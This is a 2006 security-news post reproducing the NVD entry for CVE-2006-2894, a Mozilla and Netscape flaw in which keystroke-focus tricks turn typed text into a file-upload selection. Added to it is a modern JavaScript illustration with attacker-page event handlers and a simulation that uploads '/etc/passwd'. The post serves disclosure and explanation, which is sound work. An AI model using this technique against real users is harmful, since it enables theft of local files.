Mozilla & Co. Vulnerability
Written on 06/08/06 at 10:39:33 PST by Root


Vulnerability Summary CVE-2006-2894
Original release date: 6/7/2006
Last revised: 6/8/2006
Source: US-CERT/NIST
 

Overview

Mozilla Firefox 1.5.0.4, Mozilla Suite 1.7.13, Mozilla SeaMonkey 1.0.2, Netscape 8.1, and earlier versions allow user-complicit remote attackers to read arbitrary files. The attacker tricks the user into typing the characters of the target filename into a text box and uses the onKeyDown, onKeyPress and onKeyUp JavaScript keystroke events to shift focus so that those characters are inserted into a file upload input control instead; the selected file is then uploaded when the user submits the form.
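The mechanism described above, as an added illustration that is not code from the original page, the NVD entry or the Full-Disclosure post. The element ids ("word", "f") and the attacker-page layout are assumptions made here, and the fake-DOM model is constructed for this example so the keydown/keypress/keyup ordering can be exercised outside a browser; it reproduces the pre-fix behaviour in which a file input accepted typed characters as its path.

```javascript
// Added illustration of the keystroke-redirection technique behind CVE-2006-2894.
// Not code from the original page or the cited advisories. Element ids and the
// fake-DOM model below are assumptions made for this example.
//
// The attacker page (assumed layout) contains, inside a multipart/form-data form
// posted to the attacker's server:
//   a visible box the victim is lured into typing in: <input id="word" type="text">
//   an off-screen file input: <input id="f" type="file" name="f"
//                                   style="position:absolute;left:-9999px">
// On the affected builds a file input accepted typed characters as its path, so
// steering focus to it for the instant of each keystroke turns the victim's
// typing into a file selection.

// Handlers the attacker page wires at document level (focus moves between
// elements during the keystroke, so per-element handlers would miss the keyup).
function makeKeystrokeRedirector(textBox, fileInput) {
  return {
    // keydown fires before the character is inserted: move focus to the
    // file input so the following keypress lands there.
    onKeyDown() { fileInput.focus(); },
    // keyup fires after insertion: move focus back and copy the path into the
    // visible box so the victim sees exactly what they typed.
    onKeyUp() {
      textBox.focus();
      textBox.value = fileInput.value;
    },
  };
}

// Minimal stand-in for the DOM pieces the trick depends on (constructed for
// this example). It models the vulnerable behaviour: a keypress appends the
// character to whichever element currently has focus, file inputs included.
function makeFakePage() {
  const page = { focused: null };
  const makeInput = (type) => ({
    type,
    value: '',
    focus() { page.focused = this; },
  });
  page.textBox = makeInput('text');
  page.fileInput = makeInput('file');
  page.textBox.focus();            // victim clicks into the visible box
  return page;
}

// One key in the order the browser dispatches it: keydown, keypress (whose
// default action inserts the character into the focused element), keyup.
function pressKey(page, handlers, ch) {
  handlers.onKeyDown();
  page.focused.value += ch;        // keypress default action on the affected builds
  handlers.onKeyUp();
}

// Types a whole string and reports what the victim sees versus what the form
// would actually upload on submit.
function typeString(page, handlers, text) {
  for (const ch of text) pressKey(page, handlers, ch);
  return { shown: page.textBox.value, uploaded: page.fileInput.value };
}

// Same sequence against a browser whose file inputs ignore typed text (the
// behaviour of current browsers): the keypress is a no-op on the file input,
// nothing is selected, and the mirrored text box stays empty, which is what
// makes the trick visible to the victim.
function typeStringHardened(page, handlers, text) {
  for (const ch of text) {
    handlers.onKeyDown();
    if (page.focused.type !== 'file') page.focused.value += ch;
    handlers.onKeyUp();
  }
  return { shown: page.textBox.value, uploaded: page.fileInput.value };
}

// Browser wiring for the attacker page; skipped when run under Node.
if (typeof document !== 'undefined') {
  const h = makeKeystrokeRedirector(document.getElementById('word'),
                                    document.getElementById('f'));
  document.onkeydown = h.onKeyDown;
  document.onkeyup = h.onKeyUp;
}

// Stand-alone demo of the simulation.
if (typeof require !== 'undefined' && require.main === module) {
  const page = makeFakePage();
  const h = makeKeystrokeRedirector(page.textBox, page.fileInput);
  console.log(typeString(page, h, '/etc/passwd'));
  // { shown: '/etc/passwd', uploaded: '/etc/passwd' }
}
```

Two points a practitioner should take from the simulation: the whole attack hinges on a file input accepting keyboard input as its path, so the browser-side fix (refusing typed text in file inputs) removes it completely, and the victim still has to submit the form, which is why NVD rates it as requiring voluntary interaction and scores it low.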
 

Impact

CVSS Severity: 3.7 (Low)
Range: Victim must voluntarily interact with the attack mechanism
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information; allows unauthorized modification
 

References to Advisories, Solutions, and Tools

FRSIRT advisory ADV-2006-2164: http://www.frsirt.com/english/advisories/2006/2164
FRSIRT advisory ADV-2006-2163: http://www.frsirt.com/english/advisories/2006/2163
FRSIRT advisory ADV-2006-2162: http://www.frsirt.com/english/advisories/2006/2162
FRSIRT advisory ADV-2006-2160: http://www.frsirt.com/english/advisories/2006/2160
Secunia advisory 20472: http://secunia.com/advisories/20472
Secunia advisory 20470: http://secunia.com/advisories/20470
Secunia advisory 20467: http://secunia.com/advisories/20467
Secunia advisory 20442: http://secunia.com/advisories/20442
Full-Disclosure post 20060605, "file upload widgets in IE and Firefox have issues": http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046610.html

Vulnerable software and versions

Mozilla Firefox 1.5.0.4
Mozilla Suite 1.7.13
Mozilla SeaMonkey 1.0.2
Netscape 8.1
 

Technical Details

CVSS Base Score Vector: (AV:R/AC:H/Au:NR/C:P/I:P/A:N/B:N)

Vulnerability Type: Design Error
 

CVE Standard Vulnerability Entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2894

~ Utore Security Center

News and Comments Brought to you by: www.unixcoder.org